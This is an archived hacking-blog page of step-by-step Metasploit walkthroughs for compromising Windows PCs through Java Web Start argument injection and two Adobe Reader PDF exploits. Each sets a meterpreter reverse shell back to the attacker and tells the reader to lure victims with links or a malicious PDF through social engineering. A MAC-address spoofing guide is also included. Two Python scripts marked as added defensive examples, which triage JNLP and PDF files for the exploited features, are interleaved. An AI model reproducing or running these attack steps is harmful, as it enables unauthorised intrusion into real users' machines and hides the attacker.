Archive for March, 2012
Hack Remote PC using Sun Java Command Line Injection
Sun Java Web Start Plugin Command Line Argument Injection
This module exploits a flaw in the Web Start component of the Sun Java Runtime Environment. The arguments passed to Java Web Start are not properly validated, allowing injection of arbitrary arguments to the JVM. By using the lesser-known -J option, an attacker can take advantage of the -XXaltjvm option, as discussed previously by Ruben Santamarta. This method allows an attacker to execute arbitrary code in the context of an unsuspecting browser user. In order for this module to work, it must be run as root on a server that does not serve SMB. Additionally, the target host must have the Web Client service (WebDAV Mini-Redirector) enabled.
Exploit Targets
0 – Automatic (default)
1 – Java Runtime on Windows x86
Requirement
Attacker: Backtrack 5
Victim PC: Windows XP
Open a Backtrack terminal and type msfconsole.

Now type use exploit/windows/browser/java_ws_vmargs
Msf exploit (java_ws_vmargs)>set payload windows/meterpreter/reverse_tcp
Msf exploit (java_ws_vmargs)>set lhost 192.168.1.3 (IP of Local Host)
Msf exploit (java_ws_vmargs)>set srvhost 192.168.1.3 (This must be an address on the local machine)
Msf exploit (java_ws_vmargs)>set srvport 80
Msf exploit (java_ws_vmargs)>set uripath / (The Url to use for this exploit)
Msf exploit (java_ws_vmargs)>exploit

The URL to give to the victim is http://192.168.1.3/

Send the link of the server to the victim via chat or email or any social engineering technique.
Once the victim opens the link, you have access to the victim's PC. Use “sessions -l” to list the open sessions and note the session number, then type “sessions -i ID” to interact with it.
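The module description above says the exploit works by smuggling JVM options through the -J option, and -XXaltjvm in particular. As an added defensive example (not part of the original post and not code from the Metasploit module), the Python script below triages JNLP launch files for those two tokens, which a legitimate launch file has no reason to carry. The java-vm-args attribute on the <j2se>/<java> element is the place this script assumes VM options appear; the two sample JNLP documents are constructed for the demo and the -XXaltjvm value is a placeholder.

```python
"""Triage JNLP launch files for injected JVM options (-J, -XXaltjvm).
Added defensive example, not from the original post or from Metasploit.
Assumes VM options live in the java-vm-args attribute of <j2se>/<java>;
the sample documents below are constructed."""
import re
import xml.etree.ElementTree as ET
from typing import List

# -J smuggles extra arguments to the JVM and -XXaltjvm redirects the JVM to a
# different runtime library; neither belongs in a legitimate launch file.
SUSPICIOUS = re.compile(r"(?:^|\s)(-J\S*|-XXaltjvm\S*)")


def find_vm_args(jnlp_xml: str) -> List[str]:
    """Return every java-vm-args value found on <j2se> or <java> elements."""
    root = ET.fromstring(jnlp_xml)
    values = []
    for elem in root.iter():
        # Tolerate a default namespace by dropping any {uri} prefix.
        tag = elem.tag.rsplit("}", 1)[-1]
        if tag in ("j2se", "java"):
            args = elem.get("java-vm-args")
            if args:
                values.append(args)
    return values


def suspicious_tokens(jnlp_xml: str) -> List[str]:
    """Return the -J / -XXaltjvm tokens present in any java-vm-args value."""
    found = []
    for args in find_vm_args(jnlp_xml):
        found.extend(m.group(1) for m in SUSPICIOUS.finditer(args))
    return found


def is_suspicious(jnlp_xml: str) -> bool:
    """True when the launch file carries injected JVM options or cannot be parsed."""
    try:
        return bool(suspicious_tokens(jnlp_xml))
    except ET.ParseError:
        # A launch file that does not even parse deserves a manual look.
        return True


# Constructed samples (not real launch files).
BENIGN = """<jnlp spec="1.0+" codebase="http://example.invalid/app">
  <information><title>Demo</title></information>
  <resources><j2se version="1.6+" java-vm-args="-Xmx256m"/></resources>
  <application-desc main-class="demo.Main"/>
</jnlp>"""

SUSPECT = """<jnlp spec="1.0+" codebase="http://example.invalid/app">
  <information><title>Demo</title></information>
  <resources><j2se version="1.6+" java-vm-args="-Xmx256m -J-XXaltjvm=PLACEHOLDER_PATH"/></resources>
  <application-desc main-class="demo.Main"/>
</jnlp>"""

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, is_suspicious(doc), suspicious_tokens(doc))
```

Run it over JNLP files pulled from a proxy log or mail gateway; a file that fails to parse is reported as suspicious on purpose, since the plugin may still launch it.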

How to Change MAC Address in Backtrack5
Open your Backtrack terminal and type ifconfig to check your current MAC address.

In the terminal, type ifconfig eth0 down; this command disables the eth0 interface.
Now change the MAC address with a simple Backtrack command: macchanger -r eth0
Now type ifconfig eth0 up; this command re-enables the eth0 interface.

Now type ifconfig again to check your spoofed MAC address.

Hack any Remote PC with Adobe JBIG2Decode Heap Corruption Exploit
This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier. This module relies upon JavaScript for the heap spray.
Exploit Targets
0 – Adobe Reader v9.0.0 (Windows XP SP3 English) (default)
1 – Adobe Reader v8.1.2 (Windows XP SP2 English)
Requirement
Attacker: Backtrack 5
Victim PC: Windows XP
Open a Backtrack terminal and type msfconsole.

Now type use exploit/windows/browser/adobe_jbig2decode
Msf exploit (adobe_jbig2decode)>set payload windows/meterpreter/reverse_tcp
Msf exploit (adobe_jbig2decode)>set lhost 192.168.1.4 (IP of Local Host)
Msf exploit (adobe_jbig2decode)>set srvhost 192.168.1.4 (This must be an address on the local machine)
Msf exploit (adobe_jbig2decode)>set uripath akonsong (The Url to use for this exploit)
Msf exploit (adobe_jbig2decode)>exploit

The URL to give to the victim is http://192.168.1.4:8080/akonsong

Send the link of the server to the victim via chat or email or any social engineering technique.

When the victim opens that link in their browser, a dialog box about the akonsong PDF appears immediately.

Now you have access to the victim's PC. Use “sessions -l” to list the open sessions and note the session number, then type “sessions -i ID” to interact with it.

How to Hack Remote PC using PDF
Adobe FlateDecode Stream Predictor 02 Integer Overflow
This module exploits an integer overflow vulnerability in Adobe Reader and Adobe Acrobat Professional versions before 9.2.
Exploit Targets
0 – Adobe Reader Windows Universal (JS Heap Spray) (default)
Requirement
Attacker: Backtrack 5
Victim PC: Windows XP
Open a Backtrack terminal and type msfconsole.

Now type use exploit/windows/fileformat/adobe_flatedecode_predictor02
Msf exploit (adobe_flatedecode_predictor02)>set payload windows/meterpreter/reverse_tcp
Msf exploit (adobe_flatedecode_predictor02)>show options

Msf exploit (adobe_flatedecode_predictor02)>set lhost 192.168.1.3 (IP of Local Host)
Msf exploit (adobe_flatedecode_predictor02)>set filename attack.pdf
Msf exploit (adobe_flatedecode_predictor02)>exploit
After the malicious PDF is generated, it is stored on your local computer at:
/root/.msf4/local/attack.pdf

Now we need to set up a listener to handle the reverse connection the victim sends back when the exploit executes.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.3
exploit
Now send attack.pdf to the victim; as soon as they download and open it, you get a Meterpreter shell on the victim's computer.
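Both Adobe Reader modules on this page lean on the same PDF features: the JBIG2Decode section says the module needs JavaScript for its heap spray, and this section's module is built around a FlateDecode stream with the Predictor 02 parameter. As an added defensive example (not part of the original post and not Metasploit code), the Python script below does a first-pass static triage of a PDF for those features, reporting which objects contain a JBIG2Decode filter, a FlateDecode stream with /Predictor 2, or embedded JavaScript. It searches raw bytes rather than parsing the file, so it also reports whether compressed object streams (/ObjStm) are present, because names inside those are invisible until the streams are inflated. The two sample PDFs are constructed byte strings, not real files.

```python
"""Static triage of PDFs for the decoder and JavaScript features used by the
JBIG2Decode and FlateDecode Predictor 02 exploits described above.
Added defensive example, not from the original post or from Metasploit.
Works on raw bytes (a first-pass filter, not a PDF parser); the sample PDFs
below are constructed."""
import re
from typing import Dict, List

# "N G obj ... endobj" blocks; each body is searched for indicator names.
OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)\bendobj", re.S)
JBIG2 = re.compile(rb"/JBIG2Decode\b")
JS = re.compile(rb"/(?:JavaScript|JS)\b")
FLATE = re.compile(rb"/FlateDecode\b")
PRED2 = re.compile(rb"/Predictor\s+2(?!\d)")   # matches 2, not 12 or 20
OBJSTM = re.compile(rb"/Type\s*/ObjStm\b")     # compressed object streams

EMPTY = {"jbig2": [], "javascript": [], "flate_predictor2": [], "objstm": []}


def scan_pdf(data: bytes) -> Dict[str, List[int]]:
    """Map each indicator to the object numbers in which it was found."""
    findings: Dict[str, List[int]] = {k: [] for k in EMPTY}
    if not data.startswith(b"%PDF"):
        return findings
    for m in OBJ_RE.finditer(data):
        num, body = int(m.group(1)), m.group(3)
        if JBIG2.search(body):
            findings["jbig2"].append(num)
        if JS.search(body):
            findings["javascript"].append(num)
        if FLATE.search(body) and PRED2.search(body):
            findings["flate_predictor2"].append(num)
        if OBJSTM.search(body):
            findings["objstm"].append(num)
    return findings


def is_suspicious(findings: Dict[str, List[int]]) -> bool:
    """True when any of the three exploit-related features was seen."""
    return bool(findings["jbig2"] or findings["javascript"] or findings["flate_predictor2"])


def needs_decompression(findings: Dict[str, List[int]]) -> bool:
    """True when object streams exist, so a clean raw scan is not conclusive."""
    return bool(findings["objstm"])


def triage_reasons(findings: Dict[str, List[int]]) -> List[str]:
    """Human-readable reasons to quarantine the file; empty if none."""
    reasons = []
    if findings["jbig2"]:
        reasons.append("JBIG2Decode stream in obj %s" % findings["jbig2"])
    if findings["flate_predictor2"]:
        reasons.append("FlateDecode stream with /Predictor 2 in obj %s" % findings["flate_predictor2"])
    if findings["javascript"]:
        reasons.append("embedded JavaScript in obj %s" % findings["javascript"])
    return reasons


# Constructed samples (minimal, not real documents).
BENIGN_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R >> endobj
4 0 obj << /Length 5 /Filter /FlateDecode /DecodeParms << /Predictor 12 /Columns 4 >> >> stream
xxxxx
endstream endobj
trailer << /Root 1 0 R >>
%%EOF"""

SUSPECT_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 5 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R >> endobj
4 0 obj << /Length 5 /Filter /JBIG2Decode >> stream
xxxxx
endstream endobj
5 0 obj << /S /JavaScript /JS (PLACEHOLDER_SPRAY_SCRIPT) >> endobj
6 0 obj << /Length 5 /Filter /FlateDecode /DecodeParms << /Predictor 2 /Columns 4 >> >> stream
xxxxx
endstream endobj
trailer << /Root 1 0 R >>
%%EOF"""

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_PDF), ("suspect", SUSPECT_PDF)):
        f = scan_pdf(doc)
        print(label, is_suspicious(f), triage_reasons(f), "objstm:", needs_decompression(f))
```

A JavaScript hit on its own is common in legitimate forms, so treat the JBIG2Decode and /Predictor 2 findings as the stronger signals and escalate files where needs_decompression() is true to a tool that inflates object streams before deciding they are clean.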
